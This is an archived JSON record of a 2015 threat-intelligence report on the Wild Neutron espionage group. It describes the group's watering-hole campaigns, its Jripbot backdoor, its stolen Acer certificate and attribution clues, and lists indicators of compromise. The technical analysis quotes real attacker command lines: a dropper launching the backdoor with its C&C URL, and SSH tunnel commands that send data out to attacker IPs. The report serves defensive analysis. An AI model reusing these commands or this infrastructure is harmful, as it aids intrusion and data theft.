{
	"id": "e50de9a0-2763-43d4-9e44-1a80b3759f98",
	"created_at": "2026-04-06T02:12:46.02544Z",
	"updated_at": "2026-04-10T03:35:53.683141Z",
	"deleted_at": null,
	"sha1_hash": "04782375b790b045df57c2ae4e91d69911a58dfa",
	"title": "Wild Neutron – Economic espionage threat actor returns with new tricks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 675150,
	"plain_text": "Wild Neutron – Economic espionage threat actor returns with new\r\ntricks\r\nBy GReAT\r\nPublished: 2015-07-08 · Archived: 2026-04-06 01:38:57 UTC\r\nIndicators of Compromise (IOC)\r\nA powerful threat actor known as “Wild Neutron” (also known as “Jripbot” and “Morpho“) has been active since\r\nat least 2011, infecting high profile companies for several years by using a combination of exploits, watering holes\r\nand multi-platform malware.\r\nThe latest round of attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker\r\nAcer and an unknown Flash Player exploit.\r\nWild Neutron hit the spotlight in 2013, when it successfully infected companies such as Apple, Facebook, Twitter\r\nand Microsoft. This attack took advantage of a Java zero-day exploit and used hacked forums as watering holes.\r\nThe 2013 incident was highly publicized and, in the aftermath, the threat actor went dark for almost one year.\r\n#WildNeutron is a powerful entity engaged in espionage, possibly for economic reasons\r\nTweet\r\nIn late 2013 and early 2014 the attacks resumed and continued throughout 2015. Targets of the new attacks\r\ninclude:\r\nLaw firms\r\nBitcoin-related companies\r\nInvestment companies\r\nLarge company groups often involved in M\u0026A deals\r\nIT companies\r\nHealthcare companies\r\nReal estate companies\r\nIndividual users\r\nThe focus of these attacks suggests this is not a nation-state sponsored actor. However, the use of zero-days, multi-platform malware as well as other techniques makes us believe it’s a powerful entity engaged in espionage,\r\npossibly for economic reasons.\r\nOlder (2013) campaigns\r\nDuring the 2013 attacks, the Wild Neutron actor successfully compromised and leveraged the website\r\nwww.iphonedevsdk[.]com, which is an iPhone developers forum.\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 1 of 14\n\nThe attackers injected a script into the forum that redirected visitors to another website (min.liveanalytics[.]org –\r\ncurrently SINKHOLED by Kaspersky Lab) that hosted a Java zero-day exploit. A similar attack was also found in\r\nanother forum dedicated to Linux developers: fedoraforum[.]org. For a more detailed analysis of these 2013\r\nattacks, see Eric Romang’s blog: http://eromang.zataz.com/2013/02/20/facebook-apple-twitter-watering-hole-attack-additional-informations/.\r\nOther forums compromised by the Wild Neutron group and identified by reports from the Kaspersky Security\r\nNetwork include:\r\nexpatforum.com\r\nmygsmindia.com\r\nforum.samdroid.net\r\nemiratesmac.com\r\nforums.kyngdvb.com\r\ncommunity.flexispy.com\r\nansar1.info\r\nIn particular, two of these stand out: “community.flexispy[.]com” and “ansar1[.]info“. The first one is a\r\ncommunity ran by Flexispy, a company that sells spyware for mobile devices. The second one is a Jihadist forum\r\nthat is currently closed.\r\nansar1[.]info was injected by Wild Neutron in 2013\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 2 of 14\n\nBack in 2013, the attackers also leveraged a Mac OS X backdoor, known as OSX/Pintsized. This is also described\r\nin more detail in Eric Romang’s excellent blog: http://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/. The same backdoor, compiled for Win32, is still being used in the 2015 attacks.\r\n#WildNeutron is one of the most unusual APT group we’ve analysed and tracked\r\nTweet\r\nSome of the more prominent victims of the 2013 attack include Twitter, Facebook, Apple and Microsoft. These\r\nbreaches were covered widely by the press and some affect companies, issued statements on the incident (see\r\nFacebook’s statement).\r\nThe targeting of major IT companies like Facebook, Twitter, Apple and Microsoft is unusual, however, it’s not\r\nentirely unique. The lack of victims in other sectors, such as diplomatic or government institutions, is however\r\nquite unusual. This makes us believe this is not a nation-state sponsored attack.\r\nTechnical analysis\r\nThe malware set used by the Wild Neutron threat actor has several component groups, including:\r\nA main backdoor module that initiates the first communication with C\u0026C server\r\nSeveral information gathering modules\r\nExploitation tools\r\nSSH-based exfiltration tools\r\nIntermediate loaders and droppers that decrypt and run the payloads\r\nAlthough customized, some of the modules seem to be heavily based on open source tools (e.g. the password\r\ndumper resembles the code of Mimikatz and Pass-The-Hash Toolkit) and commercial malware (HTTPS proxy\r\nmodule is practically identical to the one that is used by Hesperbot).\r\nAlthough customized, some of the modules seem to be heavily based on open source tools\r\n#WildNeutron\r\nTweet\r\nAll C\u0026C communication is encrypted with a custom protocol. Dropped executables, as well as some of the\r\nhardcoded strings are usually obfuscated with XOR (depends on bot version). The main backdoor module contains\r\na number of evasion techniques, designed to detect or time out sandboxes and emulation engines.\r\nExploitation – 2015\r\nThe initial infection vector from the 2014-2015 attacks is still unknown, although there are clear indications that\r\nthe victims are exploited by a kit that leverages an unknown Flash Player exploit.\r\nThe following exploitation chain was observed in one of the attacks:\r\nSite hxxp://cryptomag.mediasource.ch/\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 3 of 14\n\nPaths\r\n/favicon.ico\r\n/msie9html5.jpg\r\n/loader-large.gif\r\n/bootstrap.min.css\r\n/stats.js?d=1434374526478\r\n/autoload.js?styleid=20\u0026langid=5\u0026sid=883f2efa\u0026d=1434374526\r\n/banner.html?styleid=19\u0026langid=23\u0026sid=883f2efa\u0026d=1434374526\r\n/883f2efa/bniqligx.swf?styleid=4\u0026langid=6\u0026sid=883f2efa\u0026d=1434374533\r\n/883f2efa/pzixfgne?styleid=5\u0026langid=25\u0026sid=883f2efa\u0026d=1434374533\r\n/883f2efa/bniqligx.swf?styleid=4\u0026langid=6\u0026sid=883f2efa\u0026d=1434374533/\r\n/background.jpg\r\nThe subdomain cryptomag.mediasource[.]ch appears to have been created for this attack; it pointed to an IP\r\naddress associated with other Wild Neutron C\u0026Cs, highlighted in red below:\r\nHosts resolving to 66.55.133[.]89\r\nWhile app.cloudprotect[.]eu and ssl.cloudprotect[.]eu are two known Wild Neutron C\u0026Cs,\r\ncryptomag.mediasource[.]ch appears to have been pointed to this IP for the purpose of exploitation. Another\r\nsuspicious domain can be observed above, secure.pdf-info[.]com. We haven’t seen any attacks connected with his\r\nhostname yet, however, the name scheme indicates this is also malicious.\r\nIn another attack, we observed a similar exploitation chain, however hosted on a different website, hxxp://find.a-job.today/.\r\nIn both cases, the visitors browsed the website, or arrived via what appears to have been an online advertisement.\r\nFrom there, “autoload.js” appears in both cases, which redirects to another randomly named HTML file, which\r\neventually loads a randomly named SWF file.\r\nWhile the group used watering hole attacks in 2013, it’s still unclear how victims get redirected to the exploitation\r\nkits in the new 2014-2015 attacks. Instead of Flash exploits, older Wild Neutron exploitation and watering holes\r\nused what was a Java zero-day at the end of 2012 and the beginning of 2013, detected by Kaspersky Lab products\r\nas Exploit.Java.CVE-2012-3213.b.\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 4 of 14\n\nThe main malware dropper\r\nThe functionality of the main dropper is relatively simple: it decrypts the backdoor executable (stored as a\r\nresource and encrypted with a simple XOR 0x66), writes it to a specified path and then executes it with\r\nparameters that are hardcoded in the dropper body. One of the parameters is the URL address of the C\u0026C server,\r\nwhile others contain various bot configuration options.\r\nExample parameters used by the dropper:\r\nigfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu\r\nAfter executing the main backdoor, the dropper is securely deleted by overwriting its content with random\r\nnumbers several times before renaming and removing the file.\r\nThe main backdoor (aka “Jripbot”)\r\nThis binary is executed with the URL address of the C\u0026C server as a parameter; it can also receive an optional bot\r\nconfiguration. This information is then double-encrypted – first with RC4 and then with Windows\r\nCryptProtectData function – and saved to the registry.\r\nBefore performing any other activity, the malware first runs its stalling code (designed to outrun the emulators),\r\nthen performs several anti-sandboxing checks and enters an infinite loop if any unwanted software running in the\r\nsystem is detected.\r\nOtherwise, it gathers some basic system information:\r\nVersion of the operating system\r\nIf program is running under WOW64\r\nIf current user has administrator privileges\r\nWhich security features of Windows are enabled\r\nUsername and computer name\r\nServer name and LAN group\r\nInformation about logical drives\r\nSystem uptime and idle time\r\nDefault web browser\r\nProxy settings\r\nBased on some of this information, malware generates a unique ID for the victim and starts the C\u0026C\r\ncommunication by sending the ID value and awaiting commands.\r\nBackdoor configuration options may include proxy server address and credentials, sleeptime/delay values and\r\nconnection type, but the most interesting option is the resolv=[url] option. If this option is set, the malware\r\ngenerates a domain name consisting of computer name, unique ID and and the URL passed with this option; then\r\nit tries to resolve the IP address of this domain. We suspect this is the method the attackers use to send the\r\ngenerated UID to the C\u0026C.\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 5 of 14\n\nCommands from the C\u0026C may instruct the bot to perform following actions:\r\nChange the current directory to the requested one\r\nExecute an arbitrary command in the command line\r\nSet the autorun value for itself in the registry\r\nDelete the autorun value for itself in the registry\r\nShred requested file (overwrite the file content with random numbers, overwrite the file name with zeroes\r\nand then delete it)\r\nDownload file from the Internet and save it (optionally encrypted) to the disk\r\nInstall or uninstall additional malware plugins\r\nCollect and send system information\r\nEnumerate drives\r\nSet sleeptime value\r\nUpdate the configuration\r\nUpdate itself\r\nQuit\r\nOlder versions of this backdoor, used in the 2013 attacks, had a bit more functionality:\r\nPassword harvesting\r\nPort scanning\r\nCollecting screenshots\r\nPushing files to C\u0026C\r\nReverse shell\r\nThese features were removed from the newer backdoor versions that are used in recent attacks. Instead, malware\r\ndevelopers decided to implement a plugin mechanism and run different tools for different tasks. This suggests a\r\nclear shift towards more flexible modular architecture.\r\n#WildNeutron hide the C\u0026C address by encrypting it in the registry with machine-dependent\r\ninformation\r\nTweet\r\nIn terms of functionality, the main backdoor is no different from many other Remote Access Tools (RATs). What\r\nreally stands out is the attacker’s carefulness to hide the C\u0026C address, by encrypting it in the registry with\r\nmachine-dependent information. Also notable is the ability to recover from a C\u0026C shutdown by contacting a\r\ndynamically generated domain name, which only the attackers know in advance, as it is directly tied to each\r\nunique victim.\r\nAccording to the timestamp of the samples the distribution is as follows:\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 6 of 14\n\nEach backdoor appears to contain an internal version number, which ranges from 11000 to 16000 in the latest\r\nsamples. This allows us to trace the following evolutionary map:\r\nBackdoors used in the 2013 attacks:\r\nMD5 Timestamp Version Filename Size\r\n1582d68144de2808b518934f0a02bfd6 29 Nov 2012 11000 javacpl.exe 327168\r\n14ba21a3a0081ef60e676fd4945a8bdc 30 Nov 2012 12000 javacpl.exe 329728\r\n0fa3657af06a8cc8ef14c445acd92c0f 09 Jan 2013 13000 javacpl.exe 343552\r\nBackdoors used in 2014 and 2015 attacks:\r\nMD5 Timestamp Version Filename Size\r\n95ffe4ab4b158602917dd2a999a8caf8 13 Dec 2013 14014 LiveUpdater.exe 302592\r\n342887a7ec6b9f709adcb81fef0d30a3 20 Jun 2014 15013 FlashUtil.exe 302592\r\ndee8297785b70f490cc00c0763e31b69\r\n02 Aug 2013\r\n(possibly fake)\r\n16010 IgfxUpt.exe 291328\r\nf0fff29391e7c2e7b13eb4a806276a84 27 Oct 2014 16017 RtlUpd.exe 253952\r\nThe installers also have a version number, which indicates the following evolution:\r\nMD5 Timestamp Version\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 7 of 14\n\n1f5f5db7b15fe672e8db091d9a291df0 16 Dec 2011 1.4.1\r\n48319e9166cda8f605f9dce36f115bc8 28 Sep 2012 1.5.0\r\n088472f712d1491783bbad87bcc17c48 12 Apr 2013 1.6.3\r\nee24a7ad8d137e54b854095188de0bbf 07 Jan 2014 1.6.4\r\nLateral movement\r\nAfter installing the main backdoor and establishing initial C2 communication, the attackers use a range of\r\ndifferent tools to extract sensitive data and control the victim’s machine. These tools include a password\r\nharvesting trojan, a reverse-shell backdoor and customized implementations of OpenSSH, WMIC and SMB.\r\nSometimes, they only drop a simple perl reverse shell and use various collection methods to retrieve credentials\r\nfrom a set of machines, escalate privileges, and fan out across a network from there. Besides these tools, there is\r\nalso a number of small utility modules of different functionalities, from loaders and configuration tools, to file\r\nshredders and network proxies.\r\nIt’s also worth noting that this threat actor heavily relies on already existing code, using publicly available open\r\nsource applications, as well as Metasploit tools and leaked malware sources, to build its own toolset. Some of\r\nthese tools are designed to work under Cygwin and come together with the Cygwin API DLL, which may suggest\r\nthat the attackers feel more comfortable when working in a Linux-like environment.\r\nSSH tunnel backdoor\r\nDuring the 2014/2015 attacks, we observed the attackers deploying custom, OpenSSH-based Win32 tunnel\r\nbackdoors that are used to exfiltrate large amounts of data in a reliable manner. These tunnel backdoors are written\r\nas “updt.dat” and executed with two parameters, -z and -p. These specify the IP to connect to and the port. Despite\r\nthe port number 443, the connection is SSH:\r\n/d /u /c updt.dat -z 185.10.58.181 -p 443\r\n/d /u /c updt.dat -z 46.183.217.132 -p 443\r\n/d /u /c updt.dat -z 217.23.6.13 -p 443\r\nFor authentication, the SSH tunnel backdoor contains a hardcoded RSA private key.\r\nStolen certificate\r\nDuring the 2015 attacks, Wild Neutron used a dropper signed with a stolen, yet valid Acer Incorporated certificate.\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 8 of 14\n\nAcer signature on Wild Neutron dropper\r\nThe abused certificate has the following properties:\r\nSerial: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80\r\nThumbprint: 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07\r\nThe dropper (dbb0ea0436f70f2a178a60c4d8b791b3) appears to have been signed on June 15, 2015. It drops a\r\nJripbot backdoor as “IgfxUpt.exe” and configures it to use the C\u0026C “app.cloudprotect[.]eu”.\r\n#WildNeutron used a dropper signed with a stolen, yet valid Acer Incorporated certificate\r\nTweet\r\nWe have worked with Symantec, Verisign and Acer to revoke the compromised certificate.\r\nVictims and statistics\r\nThe Wild Neutron attacks appear to have a highly targeted nature. During our investigation, we have been able to\r\nidentify several victims across 11 countries and territories:\r\nFrance\r\nRussia\r\nSwitzerland\r\nGermany\r\nAustria\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 9 of 14\n\nPalestine\r\nSlovenia\r\nKazakhstan\r\nUAE\r\nAlgeria\r\nUnited States\r\nThe victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases, a\r\nsmall number of computers have been infected throughout the organizations. The attackers appear to have updated\r\nthe malware implant and deployed some additional tools, however, we haven’t observed serious lateral movement\r\nin these cases.\r\nAttribution\r\nThe targeting of various companies, without a government focus, makes us believe this is not a nation state\r\nsponsored APT. The attackers have also shown an interest in investment related targets, which indicate knowledge\r\nand skills to exploit such information on the market to turn it into financial advantages.\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 10 of 14\n\nIn some of the samples, the encrypted configuration includes a Romanian language string\r\n#WildNeutron\r\nTweet\r\nIn some of the samples, the encrypted configuration includes a Romanian language string, which is used to mark\r\nthe end of the C\u0026C communication:\r\nInterestingly, “La revedere” means “goodbye” in Romanian. In addition to that, we found another non-English\r\nstring which is the latin transcription of the russian word Успешно (“uspeshno” -\u003e “successfully”); this string is\r\nwritten to a pipe after executing a C2 command.\r\nWe found another non-English string which is the latin transcription of the russian word #WildNeutron\r\nTweet\r\nOne of the samples has an internal name of “WinRAT-Win32-Release.exe”. This seems to indicate the authors are\r\ncalling the malware “WinRAT”.\r\nMore information about the Wild Neutron attribution is available to Kaspersky Intelligence Services\r\ncustomers. Contact: intelreports@kaspersky.com\r\nConclusions\r\nCompared to other APT groups, Wild Neutron is one of the most unusual ones we’ve analysed and tracked. Active\r\nsince 2011, the group has been using at least one zero-day exploit, custom malware and tools and managed to keep\r\na relatively solid opsec which so far eluded most attribution efforts. Their targeting of major IT companies,\r\nspyware developers (FlexiSPY), jihadist forums (the “Ansar Al-Mujahideen English Forum”) and Bitcoin\r\ncompanies indicate a flexible yet unusual mindset and interests.\r\nSome of group’s distinctive features include:\r\nUse of open source tools and leaked sources of other malware\r\nUse of stolen certificate from Acer Incorporated to sign malware\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 11 of 14\n\nUse of cross platform zero-day exploit (Java and Flash) followed by cross platform payload reverse shell\r\n(Perl) for initial penetration\r\nUse of *NIX code ported to Windows through Cygwin\r\nHeavy use of SSH for exfiltration, a commonly used *NIX administration tool\r\nUse of CryptProtectData API to keep C\u0026C URLs secret\r\nSimple command line interface, built around all malware components, utilizing named pipes for\r\ncommunication between modules;\r\nAuxiliary tools are written in C and most of them contain a built-in help, which may be printed by\r\nexecuting the binary with a “–pleh” parameter\r\nWe continue to track the Wild Neutron group, which is still active as of June 2015.\r\nKaspersky products detect the malware used in the attacks as:\r\nHEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*,\r\nHEUR:Trojan.Win32.Generic\r\nRead more about how Kaspersky Lab products can help to protect you from Wild Neutron threat actor here:\r\nWild Neutron in the wild: perhaps you’re his next prey\r\nIndicators of Compromise (IOCs)\r\nKnown malicious hostnames and domains:\r\nddosprotected.eu\r\nupdatesoft.eu\r\napp.cloudprotect.eu\r\nfw.ddosprotected.eu\r\nlogs.cloudprotect.eu\r\nssl.cloudprotect.eu\r\nssl.updatesoft.eu\r\nadb.strangled.net\r\ndigitalinsight-ltd.com\r\nads.digitalinsight-ltd.com\r\ncache.cloudbox-storage.com\r\ncloudbox-storage.com\r\nclust12-akmai.net\r\ncorp-aapl.com\r\nfb.clust12-akmai.net\r\nfbcbn.net\r\nimg.digitalinsight-ltd.com\r\njdk-update.com\r\nliveanalytics.org\r\nmin.liveanalytics.org\r\npop.digitalinsight-ltd.com\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 12 of 14\n\nww1.jdk-update.com\r\nfind.a-job.today\r\ncryptomag.mediasource.ch\r\nKnown malicious IPs:\r\n185.10.58.181\r\n46.183.217.132\r\n64.187.225.231\r\n62.113.238.104\r\n66.55.133.89\r\n217.23.6.13\r\nKnown file names:\r\n%APPDATA%\\Roaming\\FlashUtil.exe\r\n%APPDATA%\\Roaming\\Acer\\LiveUpdater.exe\r\n%APPDATA%\\Roaming\\Realtek\\RtlUpd.exe\r\n%ProgramData%\\Realtek\\RtlUpd.exe\r\n%APPDATA%\\Roaming\\sqlite3.dll (UPX packed)\r\n%WINDIR%\\winsession.dll\r\n%APPDATA%\\appdata\\local\\temp\\teamviewer\\version9\\update.exe\r\n%SYSTEMROOT%\\temp\\_dbg.tmp\r\n%SYSTEMROOT%\\temp\\ok.tmp\r\nC:\\windows\\temp\\debug.txt\r\nC:\\windows\\syswow64\\mshtaex.exe\r\n%SYSROOT%\\System32\\mshtaex.exe\r\n%SYSROOT%\\System32\\wdigestEx.dll\r\n%SYSROOT%\\System32\\dpcore16t.dll\r\n%SYSROOT%\\System32\\iastor32.exe\r\n%SYSROOT%\\System32\\mspool.dll\r\n%SYSROOT%\\System32\\msvcse.exe\r\n%SYSROOT%\\System32\\mspool.exe\r\nC:\\Program Files (x86)\\LNVSuite\\LnrAuth.dll\r\nC:\\Program Files (x86)\\LNVSuite\\LnrAuthSvc.dll\r\nC:\\Program Files (x86)\\LNVSuite\\LnrUpdt.exe\r\nC:\\Program Files (x86)\\LNVSuite\\LnrUpdtP.exe\r\nDF39527~.tmp\r\nNamed pipes:\r\n\\\\.\\pipe\\winsession\r\n\\\\.\\pipe\\lsassw\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 13 of 14\n\nEvents \u0026 mutexes:\r\nGlobal\\LnrRTPDispatchEvents\r\n_Winlogon_TCP_Service\r\nSource: https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nhttps://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
	],
	"report_names": [
		"wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks"
	],
	"threat_actors": [
		{
			"id": "92c0dae2-e255-4b90-8d8f-be88e393ab8d",
			"created_at": "2022-10-25T16:07:24.402328Z",
			"updated_at": "2026-04-10T02:00:04.97641Z",
			"deleted_at": null,
			"main_name": "Wild Neutron",
			"aliases": [
				"Butterfly",
				"Morpho",
				"Sphinx Moth",
				"The Postal Group",
				"Wild Neutron"
			],
			"source_name": "ETDA:Wild Neutron",
			"tools": [
				"HesperBot",
				"Jiripbot",
				"JripBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a653b7ac-97b5-465b-98cd-8713223b06a7",
			"created_at": "2023-01-06T13:46:38.592385Z",
			"updated_at": "2026-04-10T02:00:03.032867Z",
			"deleted_at": null,
			"main_name": "WildNeutron",
			"aliases": [
				"Morpho",
				"Sphinx Moth"
			],
			"source_name": "MISPGALAXY:WildNeutron",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441566,
	"ts_updated_at": 1775792153,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/04782375b790b045df57c2ae4e91d69911a58dfa.pdf",
		"text": "https://archive.orkl.eu/04782375b790b045df57c2ae4e91d69911a58dfa.txt",
		"img": "https://archive.orkl.eu/04782375b790b045df57c2ae4e91d69911a58dfa.jpg"
	}
}